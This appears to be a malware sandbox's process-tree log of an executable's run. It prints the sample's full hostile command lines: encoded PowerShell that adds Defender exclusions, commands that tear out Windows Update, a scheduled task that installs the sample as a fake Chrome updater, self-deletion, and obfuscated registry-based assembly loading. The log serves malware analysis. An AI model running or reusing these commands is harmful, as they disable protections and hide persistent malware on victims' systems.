taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2508

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3064

C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
"C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdwBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbgAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4312

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:4984

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3156

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3192

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3208

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:4920

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4580

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4504

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4016

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:4584

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4600

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3808

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4144

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1668

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1400

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1264

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:4912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4392

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1876

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2792

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:3992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgBzAGQAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBnAEEAZAB3AEIAagBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgBrAEEARwBzAEEAZQBRAEIAaABBAEMATQBBAFAAZwBBAD0AIgAnACkAIAA8ACMAbABpACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdgBvACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAbgBwAHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAGQAawB6ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgA4ADEAOQBiAGMAYQA3ADkAZAA1AGQAOQA1ADkAOAA4ADMAOQBlADkAZABjAGYAYQAxAGEAMQAyAGYAZQBiADYAMAA3AGUANABkADIANgA5AGEANQAyAGIAMAAxADYAOQA0ADkAYQA5ADkAOQA2AGMAMgA1ADkAOAA5ADEANQAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZgBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwB1AHAAdgB3ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe"
3⤵
PID:1228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of SetWindowsHookEx
PID:4668

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:3324

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:5068

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4156

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4156 -s 784
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3708

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3708 -s 868
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:856

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3708 -s 320
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2772

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2752

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2464

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2392

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1256

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGgAdwBjACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBkAGsAeQBhACMAPgA="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:2340

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdwBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbgAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:3284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:552

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:456

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:5080

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1324

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:3716

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:4740

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:2120

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1540

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:32

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4712

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2116

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:4736

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4832

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4780

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4440

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:900

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:4616

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3520

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:3596

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:3776

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:3472

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4512

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:3080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:4856

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:4912

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
